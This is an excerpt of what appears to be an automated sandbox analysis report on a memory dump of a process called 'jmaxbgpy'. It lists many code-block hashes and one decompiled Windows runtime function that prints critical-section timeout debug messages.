                                                                    • Opcode Fuzzy Hash: 99f7eb3025f0c89b7a8e7508f29e9fe1f57eeffef6c1518c9c71b137114873eb
                                                                    • Instruction Fuzzy Hash: A7900266221000025255A599060450B0885E7D6391391C069F1416598CC6A18875A361
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.375074700.0000000000A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_a90000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ab2771a95a23b2a1b2d0513c90912b818e51e737685e1b015844a9d9965b899e
                                                                    • Instruction ID: a37e0ac19c17650d967899adc70e5001e93e6495321535b97a5631664e3e0301
                                                                    • Opcode Fuzzy Hash: ab2771a95a23b2a1b2d0513c90912b818e51e737685e1b015844a9d9965b899e
                                                                    • Instruction Fuzzy Hash: A990027220100842E21061994404B460445D7E0341F51C06AA012465CD8695C861B561
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.375074700.0000000000A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_a90000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3af5aa1a216671f2d58ce2519f4a66c502a3231183f9e71a3a696c114529cfa9
                                                                    • Instruction ID: c30fa2a5d7bca0bf62d3acebf9975c41ed408afd4442960619b60668b41d913b
                                                                    • Opcode Fuzzy Hash: 3af5aa1a216671f2d58ce2519f4a66c502a3231183f9e71a3a696c114529cfa9
                                                                    • Instruction Fuzzy Hash: 9B90027260500802E260719944147460445D7D0341F51C065A002465CD87D58A65B6E1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.375074700.0000000000A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_a90000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 659be69f6537c6856b4a278d7e34b3605983dad96ab7a4e001a885d5ded794e9
                                                                    • Instruction ID: 1279ba6ebe872f0cb41666492246e9200b7eb4ee599fedda41a5a78d08eff8db
                                                                    • Opcode Fuzzy Hash: 659be69f6537c6856b4a278d7e34b3605983dad96ab7a4e001a885d5ded794e9
                                                                    • Instruction Fuzzy Hash: 5790027220504842E25071994404A460455D7D0345F51C065A006469CD96A58D65F6A1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.375074700.0000000000A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_a90000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0acf839a1bf6c2a0e027bda01caa432864400d61cab1016c64d6b9c51a25fc81
                                                                    • Instruction ID: c731d0ac36add5569924dd98c56324c24c60b60f050a313278903dd9629f3b26
                                                                    • Opcode Fuzzy Hash: 0acf839a1bf6c2a0e027bda01caa432864400d61cab1016c64d6b9c51a25fc81
                                                                    • Instruction Fuzzy Hash: B290026260500402E250719954187060455D7D0341F51D065A002455CDC6D98A65B6E1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.375074700.0000000000A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_a90000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8a939d81e4fd1cabc4e69cc16b17da37559529d47fdebcb83e61d45206b42e60
                                                                    • Instruction ID: b0ef89177766c76499ee98f0d4d116d662485da101d51f72d532716484006b8a
                                                                    • Opcode Fuzzy Hash: 8a939d81e4fd1cabc4e69cc16b17da37559529d47fdebcb83e61d45206b42e60
                                                                    • Instruction Fuzzy Hash: 0890027230100052E610A6D95804A4A4545D7F0341B51D069A401455CC85D48871A161
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.375074700.0000000000A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_a90000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4e18ec2f0c15f35cfbe453a931314575039e578d2f34dd9247ce4696241ba891
                                                                    • Instruction ID: 0ec2c6188df7e1179102a9bcf94399cfbd2e6314c960f92fc2271eb9f0db3a05
                                                                    • Opcode Fuzzy Hash: 4e18ec2f0c15f35cfbe453a931314575039e578d2f34dd9247ce4696241ba891
                                                                    • Instruction Fuzzy Hash: C690027220100403E210619955087070445D7D0341F51D465A042455CDD6D68861B161
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.375074700.0000000000A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_a90000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2cf3d7d244ed32073fbe97c3ccb86759d0e12853f3911487fa058b850e0e5100
                                                                    • Instruction ID: 1ded18e532d4a1d35d656d21d58db86b3ada05586bd016116310bcd9b6db4fe5
                                                                    • Opcode Fuzzy Hash: 2cf3d7d244ed32073fbe97c3ccb86759d0e12853f3911487fa058b850e0e5100
                                                                    • Instruction Fuzzy Hash: 5290026220504442E21065995408A060445D7D0345F51D065A106459DDC6B58861F171
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.375074700.0000000000A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_a90000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 468828c39cb25db6bc350bfaa0522f6c4405895d078d3004fc98ecfb250469d6
                                                                    • Instruction ID: 77f12ab8cb500c504d45ff28412b9c3d0df6ce4c0d199c1da5754de67c400e58
                                                                    • Opcode Fuzzy Hash: 468828c39cb25db6bc350bfaa0522f6c4405895d078d3004fc98ecfb250469d6
                                                                    • Instruction Fuzzy Hash: 4590027620504442E61065995804A870445D7D0345F51D465A042459CD86D48871F161
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.375074700.0000000000A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_a90000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                    • Instruction ID: fb8dc60d3c8ed19cd1cc89408650463b5fda6c01436fcdf4bfc276a0f888acbd
                                                                    • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                    • Instruction Fuzzy Hash:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 53%
                                                                    			E00B4FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                    				void* _t7;
                                                                    				intOrPtr _t9;
                                                                    				intOrPtr _t10;
                                                                    				intOrPtr* _t12;
                                                                    				intOrPtr* _t13;
                                                                    				intOrPtr _t14;
                                                                    				intOrPtr* _t15;
                                                                    
                                                                    				_t13 = __edx;
                                                                    				_push(_a4);
                                                                    				_t14 =  *[fs:0x18];
                                                                    				_t15 = _t12;
                                                                    				_t7 = E00AFCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                    				_push(_t13);
                                                                    				E00B45720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                    				_t9 =  *_t15;
                                                                    				if(_t9 == 0xffffffff) {
                                                                    					_t10 = 0;
                                                                    				} else {
                                                                    					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                    				}
                                                                    				_push(_t10);
                                                                    				_push(_t15);
                                                                    				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                    				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                    				return E00B45720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                    			}










                                                                    0x00b4fdda
                                                                    0x00b4fde2
                                                                    0x00b4fde5
                                                                    0x00b4fdec
                                                                    0x00b4fdfa
                                                                    0x00b4fdff
                                                                    0x00b4fe0a
                                                                    0x00b4fe0f
                                                                    0x00b4fe17
                                                                    0x00b4fe1e
                                                                    0x00b4fe19
                                                                    0x00b4fe19
                                                                    0x00b4fe19
                                                                    0x00b4fe20
                                                                    0x00b4fe21
                                                                    0x00b4fe22
                                                                    0x00b4fe25
                                                                    0x00b4fe40

                                                                    APIs
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B4FDFA
                                                                    Strings
                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00B4FE01
                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00B4FE2B
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.375074700.0000000000A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A90000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_a90000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                    • API String ID: 885266447-3903918235
                                                                    • Opcode ID: 484480507d3c412a0a2761b0f1e5dff892c77e077c6e9ac8e61688b361fc9d6b
                                                                    • Instruction ID: 1f4e07b77d35b4ba5142125bbdeffbf0eaf4acf1dba3b77c0922343a4df4e460
                                                                    • Opcode Fuzzy Hash: 484480507d3c412a0a2761b0f1e5dff892c77e077c6e9ac8e61688b361fc9d6b
                                                                    • Instruction Fuzzy Hash: 71F0F632240605BFD6201A45DD02F33BB9AEB45730F240364F628565E2DA62FD30A7F1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%